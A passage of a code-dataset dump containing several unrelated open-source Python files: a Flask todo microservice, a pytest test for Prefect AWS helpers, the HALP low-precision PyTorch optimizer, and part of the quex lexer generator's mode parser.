int(os.getenv('REDIS_PORT'))\nredis_channel = os.getenv('REDIS_CHANNEL')\nzipkin_url = os.getenv('ZIPKIN_URL')\n\npubsub = redis.Redis(host=redis_host, port=redis_port, db=0)\n\nMongoClient('todos-api-db-1', replicaSet='rs0', serverSelectionTimeoutMS=5000, socketTimeoutMS=5000, connectTimeoutMS=5000)\nMongoClient('todos-api-db-2', replicaSet='rs0', serverSelectionTimeoutMS=5000, socketTimeoutMS=5000, connectTimeoutMS=5000)\nMongoClient('todos-api-db-3', replicaSet='rs0', serverSelectionTimeoutMS=5000, socketTimeoutMS=5000, connectTimeoutMS=5000)\ndb = MongoClient(\n 'todos-api-db-1', replicaSet='rs0', serverSelectionTimeoutMS=5000, socketTimeoutMS=5000, connectTimeoutMS=5000\n).test\n\n\n@app.before_request\ndef validate_jwt():\n auth_h = request.headers.get('Authorization')\n if not auth_h:\n print('No authorization provided')\n return 'No authorization provided', 401\n\n if not auth_h.startswith('Bearer '):\n print('Unknown token type')\n return 'Unknown token type', 401\n\n token = auth_h[7:]\n try:\n identity = jwt.decode(\n token, os.getenv('JWT_SECRET'), algorithms='HS256'\n )\n except jwt.ExpiredSignatureError:\n print('JWT is expired')\n return 'JWT is expired', 401\n g.username = identity.get('username')\n print('Valid token provided, processing...')\n\n\n@app.route('/todos')\ndef list_todos():\n try:\n cursor = db.todos.find({'username': g.username})\n except:\n time.sleep(15)\n return 'DB problem, please wait', 400\n\n result = []\n for doc in cursor:\n doc['_id'] = str(doc['_id'])\n result.append(doc)\n\n print(result)\n return jsonify(result)\n\n\n@app.route('/todos', methods=['POST'])\ndef add_todo():\n data = request.get_json()\n content = data.get('content')\n try:\n id_ = str(db.todos.insert_one({\n 'username': g.username,\n 'content': content\n }).inserted_id)\n except:\n time.sleep(15)\n return 'DB problem, please wait', 400\n\n code = str(random_with_N_digits(16))\n log_info = {\n 'zipkinSpan': {\n '_traceId': {'value': code},\n '_parentId': {'type': 'None', 'present': False},\n '_spanId': code,\n '_sampled': {'value': True},\n '_flags': 0\n },\n 'opName': 'CREATE',\n 'username': g.username,\n 'todoId': 3,\n }\n json_mylist = json.dumps(log_info, separators=(',', ':'))\n pubsub.publish(redis_channel, json_mylist)\n\n result = {'id': id_, 'content': content}\n print(result)\n return jsonify(result)\n\n\n@app.route('/todos/', methods=['DELETE'])\ndef delete_todo(id_):\n try:\n db.todos.delete_one({'_id': g.username, 'username': g.username})\n except:\n time.sleep(15)\n return 'DB problem, please wait', 400\n\n code = str(random_with_N_digits(16))\n log_info = {\n 'zipkinSpan': {\n '_traceId': {'value': code},\n '_parentId': {'type': 'None', 'present': False},\n '_spanId': code,\n '_sampled': {'value': True},\n '_flags': 0\n },\n 'opName': 'DELETE',\n 'username': g.username,\n 'todoId': id_,\n }\n json_mylist = json.dumps(log_info, separators=(',', ':'))\n pubsub.publish(redis_channel, json_mylist)\n\n print(f'Todo with id {id_} deleted')\n return 'Ok', 200\n\n\nif __name__ == '__main__':\n app.run('0.0.0.0', 8082)\n","repo_name":"Nikita-L/microservices-demo","sub_path":"todos-api/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"74304793878","text":"from prefect_setup.prefect_register.prefect_helpers import PrefectHelpers\n\nimport pytest\n\nFLOW_NAME = \"my-ecr-workflow\"\nENVIRONMENT = \"test\"\nprefect_helpers = PrefectHelpers()\n\n\ndef test_get_prefect_aws_infrastructure(mocker):\n \"\"\"\n Test get prefect AWS infrastructure to register workflow\n \"\"\"\n mocker.patch(\n \"aws_conn_helpers.AwsConnHelpers.get_subnets\",\n return_value=\"subnets\",\n )\n mocker.patch(\n \"aws_conn_helpers.AwsConnHelpers.get_iam_roles\",\n return_value=(\"iam_role1\", \"iam_role2\"),\n )\n mocker.patch(\n \"aws_conn_helpers.AwsConnHelpers.get_aws_creds\",\n return_value=(\"account_id\", \"aws_region\"),\n )\n assert (\n \"account_id\",\n \"aws_region\",\n \"subnets\",\n \"iam_role1\",\n \"iam_role2\",\n ) == prefect_helpers.get_prefect_aws_infrastructure(ENVIRONMENT)\n","repo_name":"maikelpenz/dataflow-automation-infra","sub_path":"tests/unit/prefect_setup/prefect_register/test_prefect_helpers.py","file_name":"test_prefect_helpers.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"85"} +{"seq_id":"40733477851","text":"from torch.optim.optimizer import Optimizer, required\nimport torch\nfrom torch.autograd import Variable\nimport copy, logging\nimport math\n\nimport torchhalp.quantize\n\nclass HALP(torch.optim.SGD):\n \"\"\"Implements high-accuracy low-precision algorithm.\n Args:\n params (iterable): iterable of parameters to optimize\n lr (float): learning rate\n T (int): number of iterations between the step to take the full grad/save w\n data_loader (DataLoader): dataloader to use to load training data\n weight_decay (float, optional): weight decay (L2 penalty) (default: 0)\n momentum (float, optional): momentum (default: 0)\n opt (torch.optim): optimizer to baseclass (default: SGD)\n mu (float, optional): mu hyperparameter for HALP algorithm (default: 0.1)\n bits (int, optional): number of bits to use for offset (default: 8)\n biased (bool, optional): type of rounding to use for quantization (default: unbiased)\n \"\"\"\n\n def __init__(self, params, lr=required, T=required, data_loader=required,\n weight_decay=0.0, momentum=0.0, opt=torch.optim.SGD, mu=1e-1, bits=8, biased=False):\n\n defaults = dict(lr=lr, weight_decay=weight_decay, momentum=momentum)\n\n # Choose the baseclass dynamically\n self.__class__ = type(self.__class__.__name__,\n (opt,object),\n dict(self.__class__.__dict__))\n logging.info(\"Using base optimizer {} in HALP\".format(opt))\n super(self.__class__, self).__init__(params, **defaults)\n\n if len(self.param_groups) != 1:\n raise ValueError(\"HALP doesn't support per-parameter options \"\n \"(parameter groups)\")\n\n if bits <= 1:\n raise ValueError(\"HALP requires > 1 bit.\")\n\n params = self.param_groups[0]['params']\n self._params = params\n\n self._curr_w = [p.data for p in params]\n self._z = [p.data.clone() for p in params]\n self._prev_w = [p.data.clone() for p in params]\n\n # Gradients are lazily allocated and don't exist yet. However, gradients are\n # the same shape as the weights so we can still allocate buffers here\n self._curr_grad = [p.data.clone() for p in params]\n self._prev_grad = [p.data.clone() for p in params]\n self._full_grad = None\n\n self.data_loader = data_loader\n self.state['t_iters'] = T\n self.T = T # Needed to trigger full gradient\n logging.info(\"Data Loader has {} with batch {}\".format(len(self.data_loader),\n self.data_loader.batch_size))\n # Separate scale factor for each layer\n self._scale_factors = [1 for p in params]\n self._bits = bits\n self._mu = mu\n self._biased = biased\n\n def __setstate__(self, state):\n super(self.__class__, self).__setstate__(state)\n\n def _zero_grad(self):\n for p in self._params:\n if p.grad is not None:\n p.grad.detach()\n p.grad.zero_()\n\n def _set_weights_grad(self,ws,gs):\n \"\"\" Set the pointers in params to ws and gs for p.data and p.grad.data\n respectively. This allows us to avoid copying data in and out of parameters.\n \"\"\"\n for idx, p in enumerate(self._params):\n if ws is not None: p.data = ws[idx]\n if gs is not None and p.grad is not None:\n p.grad.data = gs[idx]\n assert (p.grad.data.data_ptr() == gs[idx].data_ptr())\n\n def _rescale(self):\n \"\"\"Update scale factors for z.\"\"\"\n div_factor = math.pow(2.0, self._bits-1) - 1\n for i, fg in enumerate(self._full_grad):\n self._scale_factors[i] = fg.norm() / (self._mu * div_factor)\n\n def _reset_z(self):\n \"\"\"Set z to zero.\"\"\"\n for p in self._z:\n p.fill_(0)\n\n def _recenter(self, ws):\n \"\"\"Add the values in self._z to ws.\"\"\"\n for w, z in zip(ws, self._z):\n w.add_(z)\n\n def _compute_full_grad(self, closure):\n \"\"\" Call the closure function to compute the gradient\n over the entire dataset, and accumulate the gradient into\n self._full_grad.\n \"\"\"\n\n # Set up pointers for the full gradient\n # Reset gradients before accumulating them\n self._set_weights_grad(self._prev_w, self._full_grad)\n self._zero_grad()\n\n # Accumulate gradients\n for i, (data, target) in enumerate(self.data_loader):\n closure(data, target)\n\n # Adjust summed gradients by num_iterations accumulated over\n # Assumes loss size average argument is true\n for p in self._params:\n if p.grad is not None:\n p.grad.data /= len(self.data_loader)\n\n # Since p.grad is dynamically allocated, the pointers to the gradients won't\n # be set before backward is called the first time\n if self._full_grad is None:\n self._full_grad = [p.grad.data.clone() for p in self._params]\n\n def step(self, closure):\n \"\"\"Performs a single optimization step.\n Arguments:\n closure (callable): A closure that reevaluates the model\n and returns the loss.\n \"\"\"\n assert len(self.param_groups) == 1\n\n # Calculate full gradient\n if self.state['t_iters'] == self.T:\n self._compute_full_grad(closure)\n self._rescale()\n self._reset_z()\n # Reset t\n self.state['t_iters'] = 0\n\n # Calculate gradient of prev_w\n self._set_weights_grad(self._prev_w, self._prev_grad)\n self._zero_grad()\n closure()\n\n # Calculate the current curr_w (which equals prev_w + z)\n self._set_weights_grad(self._curr_w, self._curr_grad)\n self._zero_grad()\n loss = closure()\n\n # Adjust the current gradient using the previous gradient and the full gradient.\n for i, p in enumerate(self._params):\n # Adjust gradient in-place\n if p.grad is not None:\n # gradient_update = curr_grad - prev_grad + full_grad\n p.grad.data -= (self._prev_grad[i] - self._full_grad[i])\n\n # Set the param pointers to z to update z with step\n self._set_weights_grad(self._z, None)\n # Call optimizer update step\n super(self.__class__, self).step()\n\n # Quantize z in place\n for p, sf in zip(self._z, self._scale_factors):\n p.quantize_(sf, self._bits, biased=self._biased)\n\n # Increment \"inner loop\" counter\n self.state['t_iters'] += 1\n\n # Set curr_w to prev_w + z\n for p, p0 in zip(self._curr_w, self._prev_w):\n p.copy_(p0)\n self._recenter(self._curr_w)\n # Update param pointers to curr_w for user access\n self._set_weights_grad(self._curr_w, self._curr_grad)\n\n # Update prev_w to prev_w + z after the \"inner loop\" has finished\n if self.state['t_iters'] == self.T:\n self._recenter(self._prev_w)\n\n return loss\n","repo_name":"HazyResearch/torchhalp","sub_path":"torchhalp/optim/halp.py","file_name":"halp.py","file_ext":"py","file_size_in_byte":7114,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"85"} +{"seq_id":"7881479040","text":"\nimport quex.blackboard as blackboard\n\nimport quex.input.regular_expression.core as regular_expression\nimport quex.input.files.code_fragment as code_fragment\nimport quex.input.files.indentation_setup as indentation_setup\nimport quex.input.files.consistency_check as consistency_check\nimport quex.input.regular_expression.snap_character_string as snap_character_string\nfrom quex.input.regular_expression.construct import Pattern\nfrom quex.blackboard import setup as Setup, \\\n E_SpecialPatterns\n\nfrom quex.engine.generator.action_info import CodeFragment, UserCodeFragment, GeneratedCode, PatternActionInfo\nfrom quex.engine.generator.languages.address import get_label\nimport quex.engine.generator.skipper.character_set as skip_character_set\nimport quex.engine.generator.skipper.range as skip_range\nimport quex.engine.generator.skipper.nested_range as skip_nested_range\nimport quex.engine.generator.state.indentation_counter as indentation_counter\nfrom quex.engine.misc.file_in import EndOfStreamException, \\\n check, \\\n check_or_die, \\\n copy, \\\n error_msg, \\\n get_current_line_info_number, \\\n read_identifier, \\\n read_option_start, \\\n read_option_value, \\\n read_until_letter, \\\n read_until_whitespace, \\\n skip_whitespace, \\\n verify_word_in_list\n\nfrom quex.engine.state_machine.core import StateMachine\nimport quex.engine.state_machine.check.identity as identity_checker\nimport quex.engine.state_machine.sequentialize as sequentialize\nimport quex.engine.state_machine.repeat as repeat\nimport quex.engine.state_machine.algorithm.beautifier as beautifier\nimport quex.engine.state_machine.algorithm.nfa_to_dfa as nfa_to_dfa\nimport quex.engine.state_machine.algorithm.hopcroft_minimization as hopcroft\n\nfrom copy import deepcopy\n\n# ModeDescription/Mode Objects:\n#\n# During parsing 'ModeDescription' objects are generated. Once parsing is over, \n# the descriptions are translated into 'real' mode objects where code can be generated\n# from. All matters of inheritance and pattern resolution are handled in the\n# transition from description to real mode.\n#-----------------------------------------------------------------------------------------\n# mode_description_db: storing the mode information into a dictionary:\n# key = mode name\n# item = ModeDescription object\n#-----------------------------------------------------------------------------------------\nmode_description_db = {}\n\nclass OptionInfo:\n \"\"\"This type is used only in context of a dictionary, the key\n to the dictionary is the option's name.\"\"\"\n def __init__(self, Type, Domain=None, Default=-1):\n # self.name = Option see comment above\n self.type = Type\n self.domain = Domain\n self.default_value = Default\n\nclass ModeDescription:\n def __init__(self, Name, Filename, LineN):\n\n self.filename = Filename\n self.line_n = LineN\n\n self.name = Name\n self.base_modes = []\n # Read pattern information into dictionary object. This allows for the following:\n # (i) inheritance of pattern behavior in different modes.\n # (ii) 'virtual' patterns in the sense that their behavior can be\n # overwritten.\n self.__matches = {} # genuine patterns as specified in the mode declaration\n\n self.__repriorization_db = {} # patterns of the base class to be reprioritized\n # # map: pattern --> new pattern index\n self.__deletion_db = {} # patterns of the base class to be deleted\n\n # The list of actual pattern action pairs is constructed inside the function\n # '__post_process(...)'. Function 'get_pattern_action_pairs(...) calls it\n # in case that this variable is still [].\n self.__pattern_action_pair_list = [] \n\n # (*) Default Options\n self.options = {} \n for name, descr in mode_option_info_db.items():\n # Not only copy the reference, copy the default value object!\n self.options[name] = deepcopy(descr.default_value)\n\n # (*) Default Event Handler: Empty\n self.events = {}\n for name in event_handler_db.keys():\n self.events[name] = CodeFragment()\n\n # Register ModeDescription at the mode database\n mode_description_db[Name] = self\n\n def add_match(self, PatternStr, Action, ThePattern, Comment=\"\"):\n assert ThePattern.sm.is_DFA_compliant()\n assert ThePattern.inverse_pre_context_sm is None \\\n or ThePattern.inverse_pre_context_sm.is_DFA_compliant()\n\n if self.__matches.has_key(PatternStr):\n error_msg(\"Pattern '%s' appeared twice in mode definition.\\n\" % PatternStr + \\\n \"Only the last definition is considered.\", \n Action.filename, Action.line_n, DontExitF=True)\n\n if len(ThePattern.sm.get_orphaned_state_index_list()) != 0 \\\n or ( ThePattern.inverse_pre_context_sm is not None \\\n and len(ThePattern.inverse_pre_context_sm.get_orphaned_state_index_list()) != 0):\n error_msg(\"Pattern '%s' resulted in state machine with orphan states.\\n\" % PatternStr + \\\n \"(After Transformation to internal encoding).\\n\" + \\\n \"Please, submit a bug at quex.sourceforge.net.\", \n DontExitF=True, WarningF=True)\n\n self.__matches[PatternStr] = PatternActionInfo(ThePattern, Action, PatternStr, \n ModeName=self.name, Comment=Comment)\n\n def add_match_priority(self, Pattern, ThePattern, PatternIdx, FileName, LineN):\n if self.__matches.has_key(Pattern):\n error_msg(\"Pattern '%s' appeared twice in mode definition.\\n\" % Pattern + \\\n \"Only this priority mark is considered.\", FileName, LineN)\n\n self.__repriorization_db[Pattern] = [ThePattern, FileName, LineN, PatternIdx]\n\n def add_match_deletion(self, Pattern, ThePattern, FileName, LineN):\n if self.__matches.has_key(Pattern):\n error_msg(\"Deletion of '%s' which appeared before in same mode.\\n\" % Pattern + \\\n \"Deletion of pattern.\", FileName, LineN)\n\n self.__deletion_db[Pattern] = [ThePattern, FileName, LineN]\n\n def add_option(self, Option, Value):\n \"\"\" SANITY CHECK:\n -- which options are concatinated to a list\n -- which ones are replaced\n -- what are the values of the options\n \"\"\"\n assert mode_option_info_db.has_key(Option)\n\n option_info = mode_option_info_db[Option]\n if option_info.type == \"list\":\n self.options.setdefault(Option, []).append(Value)\n else:\n if option_info.domain is not None: assert Value in option_info.domain\n self.options[Option] = Value\n\n def get_pattern_action_pair(self, PatternStr):\n return self.__matches[PatternStr]\n\n def get_match_list(self):\n return self.__matches.values()\n\n def get_repriorization_db(self):\n return self.__repriorization_db\n\n def get_deletion_db(self):\n return self.__deletion_db\n\n def has_event_handler(self):\n for fragment in self.events.values():\n if fragment.get_code() != \"\": return True\n return False\n\n def has_pattern(self, PatternStr):\n return self.__matches.has_key(PatternStr)\n\n def has_own_matches(self):\n return len(self.__matches) != 0\n\n def has_matches(self):\n if self.__matches != {}: return True\n\n for name in self.base_modes:\n if mode_description_db[name].has_matches(): return True\n\n return False\n\nclass Mode:\n def __init__(self, Other):\n \"\"\"Translate a ModeDescription into a real Mode. Here is the place were \n all rules of inheritance mechanisms and pattern precedence are applied.\n \"\"\"\n assert isinstance(Other, ModeDescription)\n self.name = Other.name\n self.filename = Other.filename\n self.line_n = Other.line_n\n self.options = Other.options\n\n self.__base_mode_sequence = []\n self.__determine_base_mode_sequence(Other, [])\n\n # (1) Collect Event Handlers\n self.__event_handler_code_fragment_list = {}\n self.__collect_event_handler()\n \n # (2) Collect Pattern/Action Pairs\n self.__history_repriorization = []\n self.__history_deletion = []\n self.__pattern_action_pair_list = self.__collect_pattern_action_pairs()\n\n # (3) Collection Options\n self.__collect_options()\n\n def insert_code_fragment_at_front(self, EventName, TheCodeFragment):\n assert isinstance(TheCodeFragment, CodeFragment)\n assert EventName == \"on_end_of_stream\"\n self.__event_handler_code_fragment_list[EventName].insert(0, TheCodeFragment)\n\n def set_code_fragment_list(self, EventName, TheCodeFragment):\n assert isinstance(TheCodeFragment, CodeFragment)\n assert EventName in [\"on_end_of_stream\", \"on_failure\"]\n assert len(self.__event_handler_code_fragment_list[EventName]) == 0\n self.__event_handler_code_fragment_list[EventName] = [TheCodeFragment]\n\n def has_base_mode(self):\n return len(self.__base_mode_sequence) != 1\n\n def has_code_fragment_list(self, EventName):\n assert self.__event_handler_code_fragment_list.has_key(EventName)\n return len(self.__event_handler_code_fragment_list[EventName]) != 0\n\n def get_base_mode_sequence(self):\n return self.__base_mode_sequence\n\n def get_base_mode_name_list(self):\n return map(lambda mode: mode.name, self.__base_mode_sequence)\n\n def get_code_fragment_list(self, EventName):\n assert self.__event_handler_code_fragment_list.has_key(EventName)\n return self.__event_handler_code_fragment_list[EventName]\n\n def get_pattern_action_pair_list(self):\n return self.__pattern_action_pair_list\n\n def get_indentation_counter_terminal_index(self):\n \"\"\"Under some circumstances a terminal code need to jump to the indentation\n counter directly. Thus, it must be known in what terminal it is actually \n located.\n\n RETURNS: None, if no indentation counter is involved.\n > 0, terminal id of the terminal that contains the indentation\n counter.\n \"\"\"\n for info in self.__pattern_action_pair_list:\n action = info.action()\n if action.__class__.__name__ != \"GeneratedCode\": continue\n elif action.function != indentation_counter.do: continue\n return info.pattern().sm.get_id()\n return None\n\n def get_documentation(self):\n L = max(map(lambda mode: len(mode.name), self.__base_mode_sequence))\n txt = \"\\nMODE: %s\\n\" % self.name\n\n txt += \"\\n\"\n if len(self.__base_mode_sequence) != 1:\n txt += \" BASE MODE SEQUENCE:\\n\"\n base_mode_name_list = map(lambda mode: mode.name, self.__base_mode_sequence[:-1])\n base_mode_name_list.reverse()\n for name in base_mode_name_list:\n txt += \" %s\\n\" % name\n txt += \"\\n\"\n\n if len(self.__history_deletion) != 0:\n txt += \" DELETION ACTIONS:\\n\"\n for entry in self.__history_deletion:\n txt += \" %s: %s%s (from mode %s)\\n\" % \\\n (entry[0], \" \" * (L - len(self.name)), entry[1], entry[2])\n txt += \"\\n\"\n\n if len(self.__history_repriorization) != 0:\n txt += \" PRIORITY-MARK ACTIONS:\\n\"\n self.__history_repriorization.sort(lambda x, y: cmp(x[4], y[4]))\n for entry in self.__history_repriorization:\n txt += \" %s: %s%s (from mode %s) (%i) --> (%i)\\n\" % \\\n (entry[0], \" \" * (L - len(self.name)), entry[1], entry[2], entry[3], entry[4])\n txt += \"\\n\"\n\n if len(self.__pattern_action_pair_list) != 0:\n txt += \" PATTERN-ACTION PAIRS:\\n\"\n self.__pattern_action_pair_list.sort(lambda x, y:\n cmp(x.pattern().sm.get_id(),\n y.pattern().sm.get_id()))\n for pattern_action_pair in self.__pattern_action_pair_list:\n txt += \" (%3i) %s: %s%s\\n\" % \\\n (pattern_action_pair.pattern().sm.get_id(),\n pattern_action_pair.mode_name, \" \" * (L - len(self.name)), \n pattern_action_pair.pattern_string())\n txt += \"\\n\"\n\n return txt\n\n def default_indentation_handler_sufficient(Mode):\n \"\"\"If no user defined indentation handler is defined, then the \n default token handler is sufficient.\n \"\"\"\n return not Mode.has_code_fragment_list(\"on_indentation_error\") \\\n and not Mode.has_code_fragment_list(\"on_indentation_bad\") \\\n and not Mode.has_code_fragment_list(\"on_indent\") \\\n and not Mode.has_code_fragment_list(\"on_dedent\") \\\n and not Mode.has_code_fragment_list(\"on_nodent\") \n \n def __determine_base_mode_sequence(self, ModeDescr, InheritancePath):\n \"\"\"Determine the sequence of base modes. The type of sequencing determines\n also the pattern precedence. The 'deep first' scheme is chosen here. For\n example a mode hierarchie of\n\n A\n / \\ \n B C\n / \\ / \\\n D E F G\n\n results in a sequence: (A, B, D, E, C, F, G).reverse()\n\n This means, that patterns and event handlers of 'E' have precedence over\n 'C' because they are the childs of a preceding base mode.\n\n This function detects circular inheritance.\n \"\"\"\n if ModeDescr.name in InheritancePath:\n msg = \"mode '%s'\\n\" % InheritancePath[0]\n for mode_name in InheritancePath[InheritancePath.index(ModeDescr.name) + 1:]:\n msg += \" inherits mode '%s'\\n\" % mode_name\n msg += \" inherits mode '%s'\" % ModeDescr.name\n\n error_msg(\"circular inheritance detected:\\n\" + msg, ModeDescr.filename, ModeDescr.line_n)\n\n base_mode_name_list_reversed = deepcopy(ModeDescr.base_modes)\n #base_mode_name_list_reversed.reverse()\n for name in base_mode_name_list_reversed:\n # -- does mode exist?\n verify_word_in_list(name, mode_description_db.keys(),\n \"Mode '%s' inherits mode '%s' which does not exist.\" % (ModeDescr.name, name),\n ModeDescr.filename, ModeDescr.line_n)\n\n if name in map(lambda m: m.name, self.__base_mode_sequence): continue\n\n # -- grab the mode description\n mode_descr = mode_description_db[name]\n self.__determine_base_mode_sequence(mode_descr, InheritancePath + [ModeDescr.name])\n\n self.__base_mode_sequence.append(ModeDescr)\n\n return self.__base_mode_sequence\n\n def __collect_event_handler(self):\n \"\"\"Collect event handlers from base mode and the current mode.\n Event handlers of the most 'base' mode come first, then the \n derived event handlers. \n\n See '__determine_base_mode_sequence(...) for details about the line-up.\n \"\"\"\n for event_name in event_handler_db.keys():\n self.__event_handler_code_fragment_list[event_name] = []\n\n for mode_descr in self.__base_mode_sequence:\n \n for event_name in event_handler_db.keys():\n fragment = mode_descr.events[event_name]\n if fragment is not None and fragment.get_code() != \"\":\n self.__event_handler_code_fragment_list[event_name].append(fragment)\n\n return \n\n def __collect_pattern_action_pairs(self):\n \"\"\"Collect patterns of all inherited modes. Patterns are like virtual functions\n in C++ or other object oriented programming languages. Also, the patterns of the\n uppest mode has the highest priority, i.e. comes first.\n \"\"\"\n def __ensure_pattern_indeces_follow_precedence(MatchList, RepriorizationDB, PrevMaxPatternIndex):\n \"\"\"When a derived mode is defined before its base mode, then its pattern ids\n (according to the time they were created) are lower than thos of the base\n mode. This would imply that they have higher precedence, which is against\n our matching rules. Here, pattern ids are adapted to be higher than a certain\n minimum, and follow the same precedence sequence.\n \"\"\"\n # Patterns of a 'lower precedence mode' **must** have higher pattern ids\n # that patterns of a 'higher precedence mode'. This is to ensure that \n # base mode patterns precede derived mode patterns.\n min_pattern_index = min(map(lambda match: match.pattern().sm.get_id(),\n MatchList))\n if min_pattern_index > PrevMaxPatternIndex:\n return MatchList, RepriorizationDB\n\n match_list = deepcopy(MatchList)\n repriorization_db = deepcopy(RepriorizationDB)\n\n # Determine the offset for each pattern\n offset = PrevMaxPatternIndex + 1 - min_pattern_index\n assert offset >= 1\n\n # Assign new pattern ids starting from MinPatternID\n for match in match_list:\n current_pattern_id = match.pattern().sm.get_id()\n match.pattern().sm.set_id(current_pattern_id + offset)\n \n # The reprioritizations must also be adapted\n ## for key, info in repriorization_db.items():\n ## print \"##reprio:\", key, info[-1], info[-1] + offset\n for info in repriorization_db.items():\n info[-1] += offset\n\n return match_list, repriorization_db \n \n def __handle_deletion_and_repriorization(CurrentModeName, pattern_action_pair_list, \n repriorization_db, deletion_db):\n def __validate_marks(DB, DoneDB, CommentStr):\n ok_f = True\n for pattern, info in DB.items():\n if DoneDB.has_key(pattern): continue\n ok_f = False\n error_msg(\"Pattern '%s' was marked %s but does not\\n\" % (pattern, CommentStr) + \\\n \"exist in any base mode of mode '%s'.\" % self.name,\n info[1], info[2], DontExitF=True, WarningF=False)\n return ok_f\n\n def __is_in_patterns(AllegedIdenticalSM, MyDB):\n for pattern_str, info in MyDB.items():\n pattern = info[0]\n if identity_checker.do(AllegedIdenticalSM, pattern): return pattern_str\n return \"\"\n\n # DELETION / PRIORITY-MARK \n deletion_done_db = {}\n repriorization_done_db = {}\n i = 0\n size = len(pattern_action_pair_list)\n while i < size:\n match = pattern_action_pair_list[i]\n pattern = match.pattern()\n\n found_pattern = __is_in_patterns(pattern, deletion_db)\n if found_pattern != \"\":\n # Delete pattern from the list of pattern action pairs\n del pattern_action_pair_list[i]\n size -= 1\n # Mark 'deletion applied'\n deletion_done_db[found_pattern] = True\n self.__history_deletion.append([CurrentModeName, match.pattern, match.mode_name])\n continue\n\n found_pattern = __is_in_patterns(pattern, repriorization_db)\n if found_pattern != \"\":\n # Adapt the pattern index, this automatically adapts the match precedence\n old_pattern_id = pattern.sm.get_id()\n new_pattern_id = repriorization_db[found_pattern][-1]\n new_match = deepcopy(match)\n new_match.pattern().sm.set_id(new_pattern_id)\n pattern_action_pair_list[i] = new_match\n # Mark 'repriorization applied'\n repriorization_done_db[found_pattern] = True\n self.__history_repriorization.append([CurrentModeName, match.pattern, match.mode_name,\n old_pattern_id, new_pattern_id]) \n i += 1\n\n # Ensure that all mentioned marks really had some effect.\n if not __validate_marks(deletion_db, deletion_done_db, \"for DELETION\") \\\n or not __validate_marks(repriorization_db, repriorization_done_db, \"with PRIORITY-MARK\"):\n error_msg(\"Abort.\")\n return\n\n def __add_new_pattern_action_pair(pattern_action_pair_list, PatternActionPair):\n # Shallow copy is enough! Later on, there might be actions that \n # generate source code, and then the source code takes the place of\n # the action. For this to work, inherited actions must be de-antangled.\n pattern_action_pair_list.append(copy(PatternActionPair))\n\n result = []\n prev_max_pattern_index = -1\n # Iterate from the base to the top (include this mode's pattern)\n for mode_descr in self.__base_mode_sequence:\n\n repriorization_db = {}\n consider_pattern_action_pairs_f = mode_descr.has_own_matches()\n if consider_pattern_action_pairs_f:\n match_list, repriorization_db = \\\n __ensure_pattern_indeces_follow_precedence(mode_descr.get_match_list(),\n mode_descr.get_repriorization_db(),\n prev_max_pattern_index)\n\n # Delete/Repriorize patterns from more basic modes\n __handle_deletion_and_repriorization(mode_descr.name, result, \n repriorization_db, mode_descr.get_deletion_db())\n\n if consider_pattern_action_pairs_f:\n # Add the new pattern action pairs\n for pattern_action_pair in match_list:\n __add_new_pattern_action_pair(result, pattern_action_pair)\n\n # Determine the max pattern index at this level of inheritance\n prev_max_pattern_index = max([prev_max_pattern_index] + \\\n map(lambda match: match.pattern().sm.get_id(),\n match_list))\n\n\n return result\n\n def __collect_options(self):\n for mode in self.__base_mode_sequence[:-1]:\n for name, option_descr in mode_option_info_db.items():\n if option_descr.type != \"list\": continue\n # Need to decouple by means of 'deepcopy'\n self.options.setdefault(name, []).extend(mode.options[name])\n\nmode_option_info_db = {\n # -- a mode can be inheritable or not or only inheritable. if a mode\n # is only inheritable it is not printed on its on, only as a base\n # mode for another mode. default is 'yes'\n \"inheritable\": OptionInfo(\"single\", [\"no\", \"yes\", \"only\"], Default=\"yes\"),\n # -- a mode can restrict the possible modes to exit to. this for the\n # sake of clarity. if no exit is explicitly mentioned all modes are\n # possible. if it is tried to transit to a mode which is not in\n # the list of explicitly stated exits, an error occurs.\n # entrys work respectively.\n \"exit\": OptionInfo(\"list\", Default=[]),\n \"entry\": OptionInfo(\"list\", Default=[]),\n # -- a mode can restrict the exits and entrys explicitly mentioned\n # then, a derived mode cannot add now exits or entrys\n \"restrict\": OptionInfo(\"list\", [\"exit\", \"entry\"], Default=[]),\n # -- a mode can have 'skippers' that effectivels skip ranges that are out of interest.\n \"skip\": OptionInfo(\"list\", Default=[]), # \"multiple: RE-character-set\n \"skip_range\": OptionInfo(\"list\", Default=[]), # \"multiple: RE-character-string RE-character-string\n \"skip_nested_range\": OptionInfo(\"list\", Default=[]), # \"multiple: RE-character-string RE-character-string\n # -- indentation setup information\n \"indentation\": OptionInfo(\"single\", Default=None),\n}\n\nevent_handler_db = {\n \"on_entry\": \"On entry of a mode.\",\n \"on_exit\": \"On exit of a mode.\", \n \"on_indent\": \"On opening indentation.\",\n \"on_nodent\": \"On same indentation.\",\n \"on_dedent\": \"On closing indentation'.\",\n \"on_n_dedent\": \"On closing indentation'.\",\n \"on_indentation_error\": \"Closing indentation on non-border.\",\n \"on_indentation_bad\": \"On bad character in indentation.\",\n \"on_indentation\": \"General Indentation Handler.\",\n \"on_match\": \"On each match (before pattern action).\",\n \"on_after_match\": \"On each match (after pattern action).\",\n \"on_failure\": \"In case that no pattern matches.\",\n \"on_skip_range_open\": \"On missing skip range delimiter.\",\n \"on_end_of_stream\": \"On end of file/stream.\",\n}\n\ndef parse(fh):\n \"\"\"This function parses a mode description and enters it into the \n 'mode_description_db'. Once all modes are parsed\n they can be translated into 'real' modes and are located in\n 'blackboard.mode_db'. \n \"\"\"\n\n # NOTE: Catching of EOF happens in caller: parse_section(...)\n skip_whitespace(fh)\n mode_name = read_identifier(fh)\n if mode_name == \"\":\n error_msg(\"missing identifier at beginning of mode definition.\", fh)\n\n # NOTE: constructor does register this mode in the mode_db\n new_mode = ModeDescription(mode_name, fh.name, get_current_line_info_number(fh))\n\n # (*) inherited modes / options\n skip_whitespace(fh)\n dummy = fh.read(1)\n if dummy not in [\":\", \"{\"]:\n error_msg(\"missing ':' or '{' after mode '%s'\" % mode_name, fh)\n\n if dummy == \":\":\n __parse_option_list(new_mode, fh)\n\n # (*) read in pattern-action pairs and events\n while __parse_element(new_mode, fh): \n pass\n\n # (*) check for modes w/o pattern definitions\n if not new_mode.has_event_handler() and not new_mode.has_own_matches():\n if new_mode.options[\"inheritable\"] != \"only\":\n new_mode.options[\"inheritable\"] = \"only\"\n 